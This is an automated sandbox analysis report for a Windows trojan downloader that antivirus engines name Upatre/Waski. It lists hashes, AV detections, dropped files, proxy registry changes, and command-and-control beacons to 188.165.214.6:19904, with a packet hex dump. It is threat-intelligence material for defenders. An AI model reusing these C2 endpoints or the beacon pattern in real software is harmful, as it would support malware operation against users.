Analysis Date | 2016-01-25 14:24:03 |
---|---|
MD5 | c47a93fb1c893adb19a4b45c7c876bba |
SHA1 | 62008e536a2ef64a5c3931e3222382a0fa62cfe1 |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 | |
---|---|---|
Section | .code md5: 82a9707e96ce2db008581e6b8b46f4d4 sha1: 52168e36596f478f20421259da0a9af20cbb26e8 size: 5632 | |
Section | .DATA md5: 5c85347a3a4dc6e6f94b0952c08a1670 sha1: af070283074f0822d90d26c4627324b73a15fa60 size: 6656 | |
Section | RSRC md5: 929215dee27be36035d65e961b2300f9 sha1: 36baec88b3f6d76f1fe2fd00536bd5c725046ce5 size: 31232 | |
Section | .r md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0 | |
Timestamp | 2014-04-23 07:37:18 | |
AV | CA (E-Trust Ino) | Win32/Upatre.FS |
AV | Rising | No Virus |
AV | Mcafee | Upatre-FAAC!C47A93FB1C89 |
AV | Avira (antivir) | TR/Crypt.EPACK.miod.1 |
AV | Twister | TrojanDldr.Upatre.dik.wkid |
AV | Ad-Aware | Trojan.GenericKD.1949202 |
AV | Alwil (avast) | Kryptik-PAB [Trj] |
AV | Eset (nod32) | Win32/TrojanDownloader.Waski.A |
AV | Grisoft (avg) | Generic_s.DZA |
AV | Symantec | Trojan.Asprox.B |
AV | Fortinet | W32/Waski.F!tr |
AV | BitDefender | Trojan.GenericKD.1949202 |
AV | K7 | Trojan ( 004aff101 ) |
AV | Microsoft Security Essentials | TrojanDownloader:Win32/Upatre.AK |
AV | MicroWorld (escan) | Trojan.GenericKD.1949202 |
AV | MalwareBytes | Trojan.Upatre |
AV | Authentium | W32/Trojan.RLAO-7427 |
AV | Frisk (f-prot) | W32/Trojan3.LTK |
AV | Ikarus | Trojan-Downloader.Win32.Upatre |
AV | Emsisoft | Trojan.GenericKD.1949202 |
AV | Zillya! | Backdoor.CPEX.Win32.29943 |
AV | Kaspersky | Trojan.Win32.Generic |
AV | Trend Micro | TROJ_UP.FF6B08CD |
AV | CAT (quickheal) | TrojanDownloader.Upatre.AA3 |
AV | VirusBlokAda (vba32) | TrojanDownloader.Upatre |
AV | BullGuard | Trojan.GenericKD.1949202 |
AV | Arcabit (arcavir) | Trojan.GenericKD.1949202 |
AV | ClamAV | Win.Trojan.Upatre-5766 |
AV | Dr. Web | Trojan.Upatre.112 |
AV | F-Secure | Trojan-Downloader:W32/Upatre.J |
Runtime Details:
Screenshot | ![]() |
---|
Process
↳ C:\malware.exe
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1 |
---|---|
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temp\vdigj.exe |
Creates File | PIPE\wkssvc |
Creates Process | "C:\Documents and Settings\Administrator\Local Settings\Temp\vdigj.exe" |
Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\vdigj.exe"
Registry | HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL |
---|---|
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1 |
Creates File | C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat |
Creates File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Creates File | PIPE\lsarpc |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Creates Mutex | c:!documents and settings!administrator!local settings!history!history.ie5! |
Creates Mutex | WininetConnectionMutex |
Creates Mutex | c:!documents and settings!administrator!cookies! |
Creates Mutex | c:!documents and settings!administrator!local settings!temporary internet files!content.ie5! |
Winsock DNS | adapob.medianewsonline.com |
Winsock DNS | 188.165.214.6 |
Winsock DNS | kajaaninkalevalaiset.com |
Network Details:
DNS | adapob.medianewsonline.com Type: A 127.0.0.1 |
---|---|
DNS | kajaaninkalevalaiset.com Type: A |
HTTP GET | http://188.165.214.6:19904/2910us1/COMPUTER-XXXXXX/0/51-SP3/0/ User-Agent: myupdate |
HTTP GET | http://188.165.214.6:19904/2910us1/COMPUTER-XXXXXX/1/0/0/ User-Agent: myupdate |
Flows TCP | 192.168.1.1:1031 ➝ 188.165.214.6:19904 |
Flows TCP | 192.168.1.1:1031 ➝ 188.165.214.6:19904 |
Flows TCP | 192.168.1.1:1032 ➝ 188.165.214.6:19904 |
Raw Pcap
0x00000000 (00000) 47455420 2f323931 30757331 2f434f4d GET /2910us1/COM 0x00000010 (00016) 50555445 522d5858 58585858 2f302f35 PUTER-XXXXXX/0/5 0x00000020 (00032) 312d5350 332f302f 20485454 502f312e 1-SP3/0/ HTTP/1. 0x00000030 (00048) 310d0a55 7365722d 4167656e 743a206d 1..User-Agent: m 0x00000040 (00064) 79757064 6174650d 0a486f73 743a2031 yupdate..Host: 1 0x00000050 (00080) 38382e31 36352e32 31342e36 3a313939 88.165.214.6:199 0x00000060 (00096) 30340d0a 43616368 652d436f 6e74726f 04..Cache-Contro 0x00000070 (00112) 6c3a206e 6f2d6361 6368650d 0a0d0a l: no-cache.... 0x00000000 (00000) 47455420 2f323931 30757331 2f434f4d GET /2910us1/COM 0x00000010 (00016) 50555445 522d5858 58585858 2f312f30 PUTER-XXXXXX/1/0 0x00000020 (00032) 2f302f20 48545450 2f312e31 0d0a5573 /0/ HTTP/1.1..Us 0x00000030 (00048) 65722d41 67656e74 3a206d79 75706461 er-Agent: myupda 0x00000040 (00064) 74650d0a 486f7374 3a203138 382e3136 te..Host: 188.16 0x00000050 (00080) 352e3231 342e363a 31393930 340d0a43 5.214.6:19904..C 0x00000060 (00096) 61636865 2d436f6e 74726f6c 3a206e6f ache-Control: no 0x00000070 (00112) 2d636163 68650d0a 0d0a650d 0a0d0a -cache....e....
Strings